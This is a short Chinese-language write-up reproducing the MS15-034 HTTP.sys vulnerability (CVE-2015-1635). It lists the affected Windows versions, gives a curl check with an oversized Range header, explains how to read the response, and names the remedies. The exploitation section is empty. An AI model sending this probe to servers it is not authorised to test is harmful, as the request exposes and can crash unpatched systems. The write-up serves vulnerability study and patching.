漏洞复现（二）：HTTP.SYS远程代码执行漏洞(MS15-034)

目录

漏洞介绍

影响范围

漏洞危害

漏洞复现

环境配置

漏洞验证

漏洞利用

漏洞修复

         临时

         补丁

 漏洞总结

---

漏洞介绍

漏洞编号：CVE-2015-1635（MS15-034 ）

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中，当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 
成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

影响范围

Windows 7
Windows Server 2008 R2
Windows 8
Windows Server 2012
Windows 8.1
Windows Server 2012 R2

漏洞危害

        任意代码执行

        服务器数据泄露

        使服务器系统崩溃

漏洞复现

环境配置

Win 7 + IIS 7.5

漏洞验证

curl -v IP/IP:端口/域名 -H "Host:irrelevant" -H "Range: bytes=0-18446744073709551615"

通过想应状态判断是否存在该漏洞

若目标服务器存在该漏洞：HTTP/1.1 416 Requested Range Not Satisfiable

若目标服务器不存在该漏洞（打了补丁）：HTTP Error 400. The request has an invalid header name.

 漏洞利用

漏洞修复

         临时

                禁用 IIS 内核缓存

          补丁

                官方补丁下载：https://support.microsoft.com/zh-cn/kb/3042553

 漏洞总结

        有点鸡肋，配合其他漏洞使用还是可以用用的。